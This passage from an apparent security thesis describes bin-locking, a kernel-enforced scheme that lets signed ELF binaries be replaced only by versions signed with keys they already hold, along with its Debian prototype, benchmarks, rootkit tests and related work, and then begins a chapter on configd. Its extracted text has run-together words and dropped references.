The core approach of bin-locking states that a library file or executable on diskcan only be replaced by a library or executable containing a digital signatureverifiable using a public key in the previously installed binary having the samefile name. Only one signature needs to be verified in order for the replacementoperation to succeed.
An alternate approach is to require that either all signatures in the new
version of the binary be verifiable using appropriate keys in the old version, oralternatively, that all keys in the old binary be used in the verification of the newbinary (i.e., for each public key in the old binary, there is a corresponding validsignature in the new binary). While similar, the two approaches are different.
We now discuss each.
Variation 1: Verifying All Signatures in the New Binary
In the base proposal, as long as at least one signature matches, we can con-clude that the new version of the binary came from a trusted source. Variation1 requires that all signatures present in the new binary verify using public ver-ification keys in the old binary. Variation 1 is not much different from verifyinga single signature from the perspective of restricting updates. If the enforce-ment policy is that all signatures present must verify in the new version, thedeveloper of the binary could simply omit all but one signature, reducing theapproach to the base single signature verification scheme (leaving only one sig-nature that can be verified using a public key in the already-installed binary).
In variation 1, the developer needs to be able to add a public verification key
without adding a corresponding signature to a new binary (i.e., signatures cannot be tied directly to keys, as done by jarsigner Because any signaturein the new version of a binary must have a corresponding public verification keyin the old version, adding a new signature when any new key is added would
5.5. Extensions to the Core Approach
result in a new binary which fails the verification check of variation 1. Ourproposal uses key prefixes to allow the introduction of public verification keyswithout the introduction of associated signatures.
Variation 2: Verifying Using All Keys in the Old Binary
Variation 2 requires that for each public key embedded in the old version of abinary, there is a corresponding verifiable signature in the new version of thebinary. This variation prevents a new version of the binary from being installedunless all groups holding private keys corresponding to the public keys in theinstalled binary sign the new binary. This approach can be used to prevent onedeveloper from "going rogue" – taking over the application by distributing anew version only signed with their private key (even though the developer at-tempting to go rogue has a public key contained in the already installed versionof the binary). This variation prevents a single compromised private key on abinary signed by multiple parties from being usable – the attacker would haveto compromise all keys in order to replace the binary. The downside to thisapproach is that the non-malicious loss of even a single key (e.g., through harddrive failure) would result in no updates to the binary being possible.
Similar to variation 1 above, variation 2 requires that new public verification
keys can be added to the binary without adding an associated signature. If asignature can not be embedded into the binary without also embedding thecorresponding public verification key, a key could not be phased out of newversions of the binary while still having the variation 2 check pass. If version nis signed with private keys A, B, and C, then all future versions > n must also besigned with private keys A, B, and C unless signatures can be added withoutadding the associated verification public key. Our proposal uses key prefixesto allow the introduction of signatures without the introduction of associatedpublic verification keys.
Security Updates by Regular Users
The ability to restrict updates to only those files that are bin-locked with a veri-fiable signature presents another opportunity. On many systems, the user of thesystem is not the same individual as the administrator (especially in businessand educational environments). By allowing updates to bin-locked applications,we can safely allow users to install patches without granting them administra-tor access. Bin-locking provides the mechanism to ensure a user only updatesbin-locked binaries with new valid bin-locked binaries. Of course, allowing anyuser to update a binary with a new version is not appropriate in all environ-
Chapter 5. Bin-Locking
ments. We therefore propose still using traditional file access control policiesto dictate which users have permission to update a file in the first place. Inthe prototype below, we continued to enforce traditional access control policies(such as Unix discretionary file-system access controls) in addition to those ofthe bin-locking system.
A Prototype Implementation
To verify the viability of the bin-locking proposal, we modified a Debian 4.0Linux system to implement bin-locking, including the kernel interface restric-tions discussed in Chapter The prototype implementation is composed of anumber of different pieces which together protect the system. We wrote a bi-nary signing utility which is used along with associated custom scripts to signthe binaries in the Debian software archive (for Debian 4.0), creating a newlocal Debian mirror which we used for testing. We then installed these bina-ries on a test system using the Debian package manager, which we modifiedto support bin-locked binaries. The Linux kernel (version 2.6.25) on the testsystem was modified to enforce the proposed protection mechanisms (whichinclude restrictions on bin-locked binaries as well as access to the kernel andfile-systems). The boot process was modified on the test system to initializekernel data structures which limit raw writes and mounting. We discuss eachof these steps in detail below.
Extensions to the ELF Format
Executable files for a particular operating system normally follow a standardstructure. Most Unix distributions (including Linux) use the binary format fileELF (Executable and Linkable Format). The basic ELF file is represented inFigure Except for the ELF file header, all other elements are free to bearranged as desired. We modified ELF files (our approach could be adaptedto other types of files not modified by the user – e.g., Windows executables,Windows libraries, or application data files), creating a new type of ELF sectionfor storing bin-locking related data. The ELF binary file format was designedsuch that applications could create new sections and many other applications(e.g., GCC and bsign) take advantage of this flexibility.
The new bin-locking section of the ELF file is made up of one or more records
(the section table contains a field specifying the number of records), each con-taining a type of digital signature (e.g., all elements related to the DSA algo-
5.6. A Prototype Implementation
Figure 5.1. Basic ELF layout in-cluding bin-locking section.
Figure 5.2. Bin-locking file sectionlayout
rithm would be in one record). Each record specifies a signing algorithm (type),signature, prefix of the public keys that can be used to verify the digital signa-ture, and zero or more keys that are eligible to verify digital signatures of thesame type in subsequent versions of the binary. The key prefix record containsthe first four bytes of the public verification key related to the digital signatureand is used for quickly determining what verification key in a previous versionof the binary should be used for verifying the digital signature (if multiple keysshare the first four bytes, the kernel will attempt to verify with each). We illus-trate the layout of the bin-locking section in Figure
To allow for future signature schemes, we included several additional vari-
ables and flags in bin-locking section headers. The header for records andsub-records was specified to include both a length and type field, allowing themodified kernel to skip over unrecognized signature types. The prototype'ssub-record header, in addition, contains a flag that signals the kernel to zerothe data part of the record when hashing the file; signatures are stored in sub-records with this flag set. We discuss the kernel verification of digital signaturesmore in Section The layout of a sub-record is illustrated in Figure
The kernel was modified to enforce bin-locking as discussed in Section Con-sequently, the modified kernel does not allow signed binary files to be deleted,moved, or opened for writing. They can only be replaced with new binary files
Chapter 5. Bin-Locking
Figure 5.3. Layout of a sub-record in the bin-locking section (records are simi-lar).
that contain a signature verifiable using keys in the old binary. On a replace-ment request (which is initiated through a move kernel system call involving abin-locked binary), the kernel attempts to extract the keys from the old binaryand use them to verify the validity of the new binary. If the signature in the newbinary successfully verifies, the kernel moves the new binary over top of the oldbinary. Using the move system call, however, presents a dilemma. The new bi-nary must not be bin-locked (or the move will be denied), but at the same timeit must be bin-locked (to replace the old binary). The prototype kernel dealswith this by ignoring the first eight bytes of the new binary when performingmovement validation checks (a feature used by the modified Debian packagemanager discussed in Section The addition of eight new bytes at thebeginning of the ELF file change it such that the kernel does not recognize itas bin-locked (for the purposes of preventing its movement and deletion) butstill recognizes it as bin-locked (allowing it to replace another bin-locked fileif the signature verifies). During the replacement, the kernel will first verifythe signature on the new binary (ignoring the first eight bytes). If signaturevalidation passes, the kernel will move the new binary over top of the old one,removing the initial eight bytes during the move (the file is locked to prevent itfrom being modified between signature validation and the move operation). Thebin-locked binary resulting after the move is protected by the kernel. Becausebinaries currently being run cannot be modified on disk (in any Linux system),a move must be used (instead of a copy or other update mechanism) to replacebin-locked binaries. The prototype kernel retains backwards compatibility withbinary files that are not bin-locked, not restricting their replacement or re-moval. Currently, the prototype kernel can verify application binaries signedusing the Digital Signature Algorithm (DSA)
We chose not to rely on a user space helper in designing the prototype sys-
tem in order to simplify the implementation. While we believe a user space
5.6. A Prototype Implementation
helper could be implemented securely, it would need to be bin-locked itself,and the interfaces it uses to talk to the kernel would have to be designed verycarefully to avoid being susceptible to being taken over by malware. Even withkeeping the entire implementation in the kernel, the number of new lines ofcode added to the kernel was around 2000.
Detecting Bin-Locked Files
To detect whether or not a file is bin-locked, the modified kernel examines veryspecific elements in the file. It verifies that the file: 1) is an ELF file 2)contains a bin-locking section, and 3) in the bin-locking section there exists adigital signature in a format known to the kernel (currently, only DSA signa-tures are supported). To determine if a file is bin-locked, the kernel must readthe file header (the first 52 bytes of the file on a 32bit x86 platform) as well asthe section table (40 bytes per section). If any element in either the file headeror section header is considered invalid according to the ELF specification the file is treated as not bin-locked. An attacker is not able to turn a bin-lockedfile into one not bin-locked because the kernel does not allow a properly bin-locked file to be altered (except by replacing it with another properly bin-lockedfile). The eight byte header described above results in a file that is not recog-nized as a valid ELF file and hence the modified kernel allows it to be removed,modified, and moved. We assume individuals attempting to bin-lock their ownbinaries will not purposely create invalid binaries (as that would negate the ef-fort of bin-locking the binary in the first place). As part of the prototype, wecreated a tool to test that properly signed ELF files are recognized as valid. Theoverhead of enforcing bin-locking, is imperceptible to end-users of the runningsystem (a Pentium 4 at 2.8GHz with 1G of RAM), as discussed in Section
Verifying Digital Signatures
To verify that a new binary can replace an already existing bin-locked binary, themodified kernel first extracts out a list of verification keys from the old binary(which shares the same prefix as the key prefix stored in the new version ofthe binary alongside the digital signature). Using each verification key thatmatches the key prefix, the kernel attempts to verify the digital signature. Ifthe verification passes, the replacement is allowed. If the binary contains twodifferent types of digital signatures, the modified kernel will allow replacementif any one of them contains a verifiable digital signature.
While the prototype uses an older and less efficient implementation (space-
wise) to store and verify digital signatures than described herein, the methodproposed in this sub-section is preferred.
Chapter 5. Bin-Locking
Avenues for Kernel Modification
To protect the bin-locking system itself, the kernel was also modified to removeknown functionality which could be used to attack the system. The main suchknown attacks are 1) modifying the kernel to disable the protection scheme, 2)editing the bin-locked binaries directly on disk, and 3) hiding bin-locked bina-ries (by either mounting or unmounting the partitions they reside on). To pre-vent 1), we used kernel protection mechanisms discussed in Chapter Whilewe disabled module loading entirely, a better option is to deploy module-signing(as discussed by Kroah-Hartman We also limited raw disk access anddrive mounting (as discussed below).
Disabling Raw Disk Access
To protect bin-locked binaries against modification, one must also disable rawwrites for partitions that contain bin-locked files (on both mounted and un-mounted partitions). We did this by using the syscontrol from Section As part of the boot-up process, the list of partitions for which raw disk accessis disabled is written back into the syscontrol (after the initial fsck/file-systemcheck). In order for malware to enable raw disk writes, it must modify thestart-up process to disable initialization of the syscontrol and reboot the sys-tem. One solution to prevent this is to initialize the syscontrol in init (the firstbinary run). Binaries involved in the start-up process (including init) can bebin-locked, preventing modification.
In the implementation, the restriction on raw disk writes was implemented
as a user-specified list because the kernel could not determine quickly whatpartitions contain bin-locked files. As an alternative, the file-system could bemodified to include a flag indicating the presence of bin-locked files on thatpartition. If bin-locked files are present, then raw writes to the partition couldbe automatically disabled without the kernel needing a list. By avoiding file-system modifications, the prototype was able to operate at the security modulelayer not depending on a particular file-system. By leaving the file-systemunmodified, backward compatibility with systems not aware of bin-locking isalso maintained.
To prevent bin-locked files from becoming inaccessible to user-space appli-cations, the prototype restricts the locations where file-systems can be bothmounted and unmounted using the same approach of a syscontrol which sup-ports both read and write operations. By writing "< /usr/lib" to a syscontrolcreated by the prototype, the modified kernel enforces that no file-system can
5.6. A Prototype Implementation
be mounted or unmounted at /usr/lib, /usr, or /, meaning that all files in/usr/lib continue to be accessible until the system is rebooted. By writing"> /usr/lib" to the syscontrol, no file-system can be mounted on any sub-directory or parent directory of /usr/lib (i.e., > implies <). File-system rootrotations are also not permitted by the prototype if the syscontrol restrictingmounts has been written to. Although both the new syscontrols support writeoperations, all writes to these syscontrols are converted to appends by the mod-ified kernel and hence cannot be used to modify previous entries written to thebin-locking related syscontrols. Remounting partitions to enable and disablewrite access must be allowed, as this functionality is used during the normalshutdown process to avoid file-system corruption.
We currently see no easy method of avoiding the list of mount location re-
strictions. Administrators may require unmounting on devices containing bin-locked files (e.g., unmounting removable media). While it is possible to preventmounting a new file-system over bin-locked files using a file-system flag (asdiscussed above), whether to prevent file-system unmounts depends on the en-vironment.
Modifications to Executable Files
To bin-lock binary files, the prototype used binary rewriting. An application wascreated which would use one or more signing keys to sign an existing binary,injecting into the binary both the signatures and all the verification public keysrelated to the signature (we chose not to use bsign preferring a simplermethod). ELF files are used for both program executables and shared libraries– the bin-locking approach covers both. Currently, the signing application signsbinaries using DSA, although this can be extended to other signature formats.
The modification of executables is backwards compatible. Signed (i.e., bin-locked) binaries can be used seamlessly on a system which does not understandbin-locking.
We modified the Debian package manager to not write out bin-locked
binaries to temporary files during the installation of the system (since once writ-ten into a temporary file, the modified kernel will not allow the file to be movedor deleted). Instead, the package manager writes out an eight byte prefix (weused the prefix CODESIGN) followed by the signed file (which is recognized assuch by the modified kernel during replacement of the original signed file, asmentioned in Section The binary rewriting application was used alongwith several additional scripts to create a local Debian 4.0 mirror whereevery application binary and library was bin-locked.
One element in the standard Debian boot process initially posed an issue for
Chapter 5. Bin-Locking
our bin-locking process. During the boot process, the temporary initial RAMdisk (a file-system within RAM which stores files used early in the boot process)is deleted because it is no longer necessary. If this initial RAM disk containsbinaries that are bin-locked, the new kernel prevents the delete. To overcomethis, bin-locking is disabled in the prototype on drives not associated with aphysical device.
As partial evidence that the modified kernel and signed executables are vi-
able, a paper was written on a test system (which used the prototypeimplementation). On the system, all binaries and libraries were bin-locked andkernel restrictions were active. The test system, while running KDE (the graph-ical based K Desktop Environment) was also used to browse the web, write e-mail, listen to music, and view video – all with no noticeable differences froman ordinary system. This confirmed that it is possible to lock down the kernelinterface, as well as use bin-locking on a deployed system, with the resultingsystem still usable for everyday tasks.
Any performance impact of the proposed system was imperceptible to this the-sis' author, the end-user, during the writing of a paper (and indeed whileperforming other common activities such as web browsing, video watching,and image editing). For more precise measurement, we ran benchmark tests toquantify the overhead of the system. Using the Perl benchmark library we measured the average increase in kernel time required to perform a deleteand move operation on both non-ELF and unsigned ELF files with an ext3 file-system. Over 25000 test runs (10000 with a small file, 10000 with a mediumone, and 5000 with a large file), the average increase in time to delete or movea non-ELF file was 15.59% or 6.032µs when the file was cached. The time re-quired to open a cached non-ELF file for writing similarly went up by 34.84%or 3.86µs. For unsigned ELF files, the overhead of deleting or moving the fileincreased by 26.77% or 13.3µs. The overhead of opening an unsigned ELF filefor writing increased by 66.65% or 7.73µs. All tests were performed on a Pen-tium 4 at 2.8GHz with 1G of RAM. While these percentage increases are highfor opening a file, the amount of physical time required to open a file remainssmall. In the interest of retaining file-system compatibility with kernels not en-abling bin-locking, we chose not to optimize the overhead of moving, deleting,and opening bin-locked files. By reserving one bit per file on the file-system forindicating whether a file is signed or not, this overhead could be brought downto essentially 0%.
When the file was not cached, the time required to perform an update, move,
5.6. A Prototype Implementation
or open varies with the speed of the hard drive. Determining if a file is bin-locked requires three additional hard drive accesses. The first disk read is tobring in the data block pointers the second is to read the ELF header, andthe third is to read the section table. With a delete, the data block pointers needto be read from disk anyway, resulting in bin-locking requiring an overhead ofjust two additional disk reads. During prototype testing, the average increasein time required to both delete and move a non-cached and unsigned ELF filewas 28ms. This overhead can also be brought down by tracking whether filesare bin-locked on the file-system.
The cost of replacing a bin-locked file (i.e., the cost of validating the signa-
ture on a signed binary) is O(n) in the proposed system (where n is the size ofthe file), an increase from O(1) in a system not enforcing the protection mech-anism. This overhead translates to 111.8ms on the test system for a 1M binary(with disk caching and using the older digital signature verificationimplementation as mentioned in Section The overhead is apparentlyunavoidable, since the entire file must be hashed to verify a digital signature.
We emphasize that this cost is only occurred during the install or upgrade of abin-locked binary, not while performing normal tasks (i.e., executing an appli-cation).
Protection Against Current Rootkits
To verify that the bin-locking system was able to defend against rootkit mal-ware, we attempted to install several Linux Linux rootkits can begrouped into two categories. The first category is those that use some methodto gain access to kernel memory, installing themselves in the running kernel.
These rootkits then operate at kernel level, hiding their actions from even rootprocesses. The second category consists of rootkits that replace core systembinaries. These binaries are often used by the root user in examining a system.
Both classes of rootkits work to hide nefarious activities and processes on acompromised system.
We selected six representative Linux rootkits, two that modify the kernel
and four that replace system binaries. Both kernel-based rootkits (suckit2and mood-nt) failed to install because of disabled write access to /dev/kmem.
The mood-nt kernel based rootkit which we tested also attempted and failed toreplace /bin/init (in order to re-initialize itself on system boot); this replace-
3Disabling disk caching involves writing other information to memory, causing the cached
file to expire and be removed from disk cache.
Chapter 5. Bin-Locking
ment was denied by the modified kernel. The four binary replacement rootkits(ARK 1.0.1, cb-r00tkit, dica, and Linux Rootkit 5) were all denied when at-tempting to replace core system programs (e.g. ls, netstat, top, and ps).
The bin-locking prototype provided protection against the modification of bothapplication and system binaries. The fact that no rootkit was able to installis supporting evidence of expected protection functionality of the bin-lockingsystem.
Because the prototype requires a reboot to delete or move bin-locked binaryfiles, the process of rebooting into a kernel which does not enforce bin-lockingmust be as usable as possible. We used the standard GRUB boot loader toprovide an option to the user as to whether or not to use the bin-locking enabledkernel; the user must then select one of the non-enforcing kernels from themenu during boot. Once booted into an alternate kernel, the user may deleteand move bin-locked files, including those installed by malware (as discussedin Section An open problem is how to persuade users to choose to usethe kernel which enforces bin-locking. Creating a trusted interface betweenthe kernel and user (e.g., see Ye et al. – one that cannot be subverted bymalware – may help eliminate the reboot requirement; as discussed in Sectiona hardware key is one such option.
Protection Against Downgrade Attacks
The downgrade attack involves an attacker replacing a recent version of a filewith an earlier version known to contain vulnerabilities. To protect against thisattack, we suggest deploying versioning (as discussed in Section Shouldthe particular implementation of bin-locking not support the versioning exten-sion, developers can protect against the downgrade attack by introducing newpublic verification keys and expiring older keys when releasing a new version ofthe binary known to fix vulnerabilities. Since the key will have changed, noneof the public verification keys in the newer binary (which is currently installed)would be able to be used in validating a public verification key in the old binary,and downgrade would be prevented.
5.7. Related Work
File Types
Bin-Locking (this chapter)
Google Android v2.0
Rootkit-Resistant Disks
Table 5.1. Comparison of related file-system protection mechanisms. Thegranularity indicates to what extent the principle of least privilege is appliedwhen modifying files.
Related Work
We first compare bin-locking with several closely related proposals and thendiscuss other related work in Section Table focuses on Google An-droid v2.0 rootkit-resistant disks Tripwire and using read-only media comparing the approaches on whether they are proactive (pre-vent versus detect modifications), accommodate upgrades (without extra end-user effort), the types of files they protect, and the granularity of protection.
While only bin-locking and Android accommodate program upgrades, the tableis not the full story. We now discuss differences in more detail.
In parallel to and independent of our work (but subsequent to publication ofour preliminary design Google introduced a signing approach inthe Android platform which closely parallels bin-locking. An application de-veloped for Android v2.0 is packaged and signed with a private key created bythe developer. As with bin-locking, there is no requirement for a public keyinfrastructure. Application updates under Android are allowed if all public ver-ification keys in the new version are also in the installed version of the package,and can be used to verify the corresponding signatures in the new version (vari-ation 2 in Section In contrast to bin-locking, Android precludes new pub-lic verification keys being introduced during upgrade. While bin-locking signsindividual binaries, Android signs application packages. Each application iscopied into its own separate directory during install by the Android OS. The OS
Chapter 5. Bin-Locking
keeps track of application signatures and prevents applications from overwrit-ing files outside their install directory. The Android approach protects all typesof files, not just application binaries. Backwards compatibility requirementspreclude bin-locking from assuming that all data associated with an applicationis installed into the same directory (e.g., configuration files are commonly allstored in /etc and binaries stored in /usr/bin on Linux The Androidsigning approach is a customized solution for the platform because of the con-straints it puts on how and where applications are installed. Bin-locking comesas close as possible (in our view) to a general solution while preserving back-ward compatibility with current file-system layouts.
In Android version 1.6, each public key is tied directly to a signature it can
be used to verify (see Section This enforces that keys can not be addedin subsequent versions of the application package (again, discussed in SectionThe tying of keys directly to signatures instead of using a key prefix is anartifact of using the Java archive signer. Another artifact is that an applicationcan be repeatedly signed with previous signatures remaining valid (recall, bin-locking does not allow this because it also signs all bin-locking metadata andkeys). In preventing signatures corresponding to new private keys from beingadded to subsequent versions of the application, an attacker is prevented fromsigning a valid package to produce a new valid package including a signaturecorresponding to a private key that the attacker possesses.
Rootkit-resistant disks by Butler et al. relies on the user inserting a hard-ware token every time an area of the disk "protected by" that token is updated.
New changes written to disk with the token inserted are marked as requiringthe presence of that token in order to be modified. While rootkit-resistant disksprotect a much larger range of file types than bin-locking, a knowledgeableuser is required to insert the hardware token whenever any write operation isperformed to the protected files (including updates). To protect every appli-cation separately, a different hardware token would need to be used for everyapplication installed on the system. If only one token is used, then any applica-tion can modify any other application arbitrarily as long as the hardware tokenis inserted. A single-token system fails entirely if the user is ever tricked intorunning malware during the time the token inserted (including if the token isinserted after malware has started running).
Combining rootkit-resistant disks with bin-locking would eliminate the most
common instance which would require the token – a software update. A com-bined solution would also increase the granularity of the rootkit-resistant disk
5.7. Related Work
solution while protecting all types of configuration files – a protection the cur-rent bin-locking approach does not provide.
The general approach of restricting writes to the file system as a method to
combat malware is longstanding Simply asking the user for authorizationevery time a file is modified on the system results in an unworkable solution,even for experienced developers. Rootkit-resistant disks go a long way towardcreating a workable solution. Bin-locking takes the approach further in allowingupdates to be performed without user intervention.
Tripwire and Read-Only Media
Tripwire records cryptographic checksums for all files on a system todetect what files are changed by malware (by comparing against the currentchecksum). Read-only media prevents any change from being made tothe drive while the system is running, allowing the user to revert to a known-good state by simply rebooting the system. While Tripwire and read-only mediadiffer from each other in their ability to prevent changes to the file-system,they share many characteristics, the most prominent being the way they dealwith software installs and upgrades. With read-only media, the install or up-grade must be made on a system with writable media and then a new versionof the read-only media is created – a potentially time-consuming process. WithTripwire, all changes to the file-system are flagged as potentially bad and theuser must verify that each file modification is indeed acceptable (also a timeconsuming process). In both cases, security patches become troublesome toinstall. With Tripwire, the user has the option of verifying that an applicationdoes not overwrite core system binaries during install or upgrade – the sameis not the case when updating read-only media. Tripwire does not prevent themodification of a file; it only detects these modifications.
Other Related Work
Related to work by Butler et al. SVFS also protects files on diskat the cost of running everything in a virtual machine. Software updates andinstalls are not addressed by SVFS. Strunk et al. proposed logging allfile modifications for a period of time to assist in the recovery after malwareinfection. Their approach does not prevent binaries from being modified inthe first place. By combining their approach with bin-locking, logging can berestricted to configuration file changes – decreasing disk space requirements.
Chapter 5. Bin-Locking
There have been many attempts at detecting modifications to binaries (in ad-
dition to Tripwire, discussed above). Windows file protection (WFP) maintains a database of specific files which are protected, along with signaturesof them. The list of files protected by WFP is specified by Microsoft and focuseson core system files. WFP is designed to protect against a non-malicious end-user, preventing only accidental system modification. Pennington et al. proposed implementing an intrusion detection system in the storage device todetect suspicious modifications. All these attempts rely on detecting modifi-cations after the fact. While WFP is capable of handling updates, the othersolutions do not appear to directly support binary updates.
Apvrille et al. presented DigSig, an approach which also uses signed
binaries in protecting the system. They modified the Linux kernel to preventbinaries with invalid signatures from being run (as opposed to the bin-lockingapproach of preventing the modification). Under DigSig, all binaries installedmust be signed with the same key. While the use of a single key may workfor corporate environments deploying DigSig, it does not seem well suited todecentralized environments. DigSig also relies on a knowledgeable user toverify all updates to binary files (similar to Tripwire) before signing them withthe central key.
The approach to bin-locking differs from that of van Doorn et al. (and
indeed many other signed-executable systems such as that by Pozzo et al. and Davida et al. In these systems, the installation (or running) of binariesis restricted by whether or not the application is signed with a trusted key.
In contrast, bin-locking does not restrict the introduction of new executables(those with new file names) onto the system and does not rely on any specificroot signature key being used, or external notions of trusted keys; it does notrely on any centralized PKI.
With all the approaches described (with the exception of that by Butler et
al. when using multiple tokens), it seems one common pitfall is that anyapplication performing an update or install will have permissions sufficient tomodify any other binary on the system. Some proposed systems attempt to mit-igate this threat by assuming a vigilant and knowledgeable user will verify allchanges to binaries. They rely on this user to never be tricked into installing aTrojan application. We believe that by differentiating between files originatingfrom different developers or organizations, bin-locking can rely less on vigilantand knowledgeable users to protect some parts of the system. All approachesexcept bin-locking treat upgrades the same as new application installs.
While policy systems such as SELinux have the capability to re-
strict configuration abilities, the overhead of correctly configuring a policy forevery application (including every installer) makes this approach unrealistic in
5.8. Final Remarks
many environments. Bin-locking allows binaries to be protected based on whodeveloped (or created ) them, a property not easily translated into frameworkssuch as SELinux. While projects such as DTE-enhanced UNIX and XENIXrestrict the privileges of root (reducing the risk of system binaries be-ing overwritten), installers (and even upgrades) are still given full access to allbinaries on disk.
The OpenBSD schg and ext2 immutable flags are similar to bin-
locking in that they prevent files from being changed, moved, or deleted. Theseflags, however, do not allow an application binary to be updated, resulting in asystem more akin to read-only media (see Section
Conventional code-signing involves verifying the author (code source) be-
fore software is run Code-signing approaches generally do not restrictwhat the software can do while running. When applied to installers, code-signing allows a user to verify the source of the software they are about toinstall (and that the software has not been modified since the vendor signedit) – the same is true for package managers In both cases, the signatureapplies to the entire package (not to the individual binaries) and does not endup restricting which binaries either the installer application or installed pro-gram can modify. While some systems may maintain a cryptographic hash forfiles installed, these hashes are more akin to those used by Tripwire (see Sec-tion Hashes alone are insufficient for tying two versions of a binary tothe same source. While the bin-locking approach can prevent binaries modi-fied during distribution from being installed as an upgrade, we do not focusspecifically on this problem as do Bellissimo et al.
The approach discussed in this chapter provides a convenient method for tyingthe product of a developer's efforts to the developer. While we took the ap-proach of tying binary files the developer created to a key the developer holds,the approach is equally capable of tying other digital objects (or indeed, collec-tions of objects such as an application package) to the developer key. Shouldthe specific implementation created by the guardian not support unsigned bina-ries, all developers would be forced to sign their applications. We believe such arestriction would not overburden developers, since the process of a developersigning an application does not require any third party. Android already en-forces such a requirement, where all applications must be signed before beinginstalled. The approach of being able to isolate the work of a developer frombeing modified by others without the use of a centrally managed PKI provides a
Chapter 5. Bin-Locking
mechanism for restricting the abilities of malware. The approach does not relyon the end-user for enforcement, protects all applications using the approach,and is implemented by a guardian (the OS developer). It therefore follows thethesis goal of providing a guardian enforced mandatory access control mecha-nism which can be deployed.
Configd: Reducing Root
File-System Privilege
While the principle of least privilege dictates that the privileges assigned toa process should be no more than the privileges required to perform the de-signed task, the standard exercising of root privilege in order to install appli-cations does not follow the principle. While some progress has been made byencouraging users and daemons not to run as root, the same cannot be said forinstallers – perhaps the most common use of root privilege in the current com-puting environment is for system reconfiguration (i.e., installing, uninstalling,or upgrading software). In this chapter, we pursue reducing the file-systemprivileges of root in order to better protect a system against abuse.
The actions performed by any user (including root) on a system can be par-
titioned into two classes. The first involves actions related to performing day-to-day operations on the system (e.g., writing a paper, browsing, reading email,or playing a game). Such actions typically do not have a lasting impact on thestate of the system (modulo data file creation and deletion). The second classinvolves actions related to changing system configuration. We define the con-figuration state of a system as the set of programs installed, as well as theglobal configuration related to each program. In order to survive reboot, boththe programs installed and all global configuration state must be saved intothe file-system, and hence we focus on those configuration operations having adirect visible effect on disk.
In this chapter, we focus on preventing one application from modifying an-
other's file-system objects on disk. We focus exclusively on system-wide appli-cation data, configuration, and binary files (i.e., we do not consider user datafiles in this chapter). The common protection long used in practice is to limitwrite access to application file-system objects (e.g., files including binaries, di-rectories, symbolic links, and other objects that are part of the file-system) toroot This protection mechanism fails to prevent abuse by applications dur-
Chapter 6. Configd
ing install, upgrade, or uninstall. In today's computing environments, it is onlyrealistic to treat any two applications on a system as mutually untrustworthy.
Given this updated threat model, we further subdivide configuration in orderto encapsulate applications – by this we mean that while it may be possible forone application to read the binary, data, and configuration files belonging toanother application, it is not possible to modify another's files on disk. In con-trast, current desktop approaches for software installation do not prevent anapplication from modifying or deleting file-system objects related to or createdby an unrelated application. Our restriction and division of root file-systempermissions addresses this problem, without requiring any radical change infile-system layout (e.g., applications can still install their binaries in a commonlocation such as /bin). As a direct result, applications are better protected frommalware and other applications, even those running with root privileges. Theapproach discussed in this chapter is distinct from that discussed in Chapter in that we focus on enforcing additional protection mechanisms on all types ofconfiguration related files, not just application binaries.
In our design, the preliminary ideas of which were outlined in a workshop
paper the ability to modify arbitrary objects (beyond simply files) on thefile-system is removed from root and reassigned to a process running with anew configuration privilege. This process in turn can be used to prevent one ap-plication from modifying the file-system objects related to another. In creating adistinct configuration permission, the configuration tasks currently performedunder root privilege are separated from the everyday tasks. Daemons, applica-tions, or installers running as root no longer automatically inherit configurationprivilege. Configd acts as a reference monitor for system configuration.
Our implemented prototype using Debian 5.0 as the base environ-
ment, consists of a modified Linux kernel which restricts updates to designatedfile-system objects, a modified Debian package manager, and a user-space dae-mon (called configd) which is responsible for protecting an application's file-system objects from being modified by other applications. A control point madeavailable in configd allows each configuration related file-system modificationrequest to be examined, and either authorized or denied. As we explain indetail later, the prototype successfully prevented installation of current rootkitmalware while having an imperceptible overhead to the end-user. While our dis-cussion and prototype focus on Linux, we believe the approach can be adaptedto Windows, Mac OS X, BSD, and other operating systems. Indeed, configdimplemented on Windows could also protect the Windows registry (since it isstored on disk).
1This prototype is distinct from the prototype in Chapter
6.1. Background on Installers
Background on Installers
Our approach of limiting abuse of root privilege as it relates to configurationchanges of designated file-system objects is most relevant to the case of soft-ware installs, upgrades, and uninstalls. For context and to highlight the prob-lem, we review existing approaches to installing software on a desktop.
The most common approach to installing applications on commodity desktopsand servers is through the use of an application installer. The installer is a bi-nary or script, often written by the same company or individual that developedthe application. Its purpose, when run, is to place the various file-system ob-jects associated with the application in the correct location and configure anysystem parameters (e.g., in some cases to ensure the program gets run dur-ing boot). Application installers are typically given complete control over thesystem during install, with users encouraged to run them with full permissionsas shown in Figure Whenever an application installer is run on a typicalsystem, the entire system is opened up for modification by the installer. If theinstaller is malicious, or can be compromised the entire system can be-come easily compromised. This approach does not prevent one application'sinstaller from modifying the file-system objects of another application.
(a) A Windows XP prompt
(b) A Windows 7 prompt
Figure 6.1. Windows prompts to run an installer with administrator privileges.
Application install scripts, like those executed through the make install
command on many open source projects, are a slight variation of the applicationinstaller. When told to install to a user's home directory, they do not require
Chapter 6. Configd
administrator privileges. They still require administrator privileges, however,when attempting to install to a location controlled by the administrator. Usingmake install does not prevent modification of file-system objects belongingto other applications installed by the same user. While Windows encouragesfollowing the principle of each application installing into its own directory onthe file-system, the practice of running application installers as root leaves theprinciple unenforced.
Package managers are typically provided by an operating system (OS) or OSdeveloper to ease development of an application installer for the platform. In-stead of writing an application installer from scratch, the application developercreates a package using the package manager APIs and following the rules setby those who developed the package manager. Typically, the package consistsof data used by the package manager, as well as files to be installed and scriptsto run as part of the install. Common install operations are taken care of by thepackage manager. While the development of package managers has resulted ininstallers transitioning from being executables to packages (e.g., various Linuxpackages Microsoft Installer packages and Apple application pack-ages most of these package managers still allow for executing arbitrarybinary code or scripts contained in the package being installed, resulting inthe same level of risk to the system as if an executable was run to performthe install. If root permission is requested by the package (or required by thepackage manager, as is the case with Linux packages), and the end-user en-ters an appropriate password when prompted (as users are now well trainedto do so upon request), these scripts are run as root. The use of applicationpackages does not prevent an application from modifying arbitrary file-systemobjects. One example of a malicious Debian package was a screensaver postedon The package, when installed, would also down-load and install a bot onto the local machine
Apple Bundles and Packages
With Mac OS X, Apple introduced a new method for installing commodity ap-plications other than application packages: application bundles. This results intwo approaches on Mac OS X for installing software.
6.1. Background on Installers
Figure 6.2. A KPackage prompt to obtain root privileges before installing apackage.
